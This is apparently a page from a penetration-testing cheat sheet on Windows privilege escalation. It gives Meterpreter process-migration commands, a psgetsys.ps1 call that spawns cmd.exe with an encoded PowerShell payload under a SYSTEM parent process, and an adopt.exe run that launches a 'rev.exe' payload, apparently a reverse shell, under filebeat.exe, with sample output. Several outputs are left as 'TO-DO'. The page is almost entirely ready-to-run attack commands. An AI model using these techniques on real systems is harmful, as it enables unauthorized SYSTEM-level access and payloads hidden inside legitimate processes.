Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Tools
# Inside meterpreter
ps winlogon
Sample Output:
TO-DO# Explorer.exe is a good candidate
migrate <PID>
Sample Output:
TO-DO# Import module
. .\psgetsys.ps1
Sample Output:
TO-DOImpersonateFromParentPid -ppid <PID> -command "c:\windows\system32\cmd.exe" -cmdargs "/c <POWERSHELL_3_BASE64>"
Sample Output:
TO-DORef: psgetsys
.\adopt.exe '<PROCESS>' '<CMD>'
Sample Output:
PS C:\windows\tasks> .\adopt.exe filebeat.exe "C:\windows\tasks\rev.exe"
.\adopt.exe filebeat.exe "C:\windows\tasks\rev.exe"
[>] Target pid is 2776
[>] ShellExecuteExW is at 00007FFBE93E74A0
[>] Thread running, done! (Handle: 192)
Ref: adopt.exe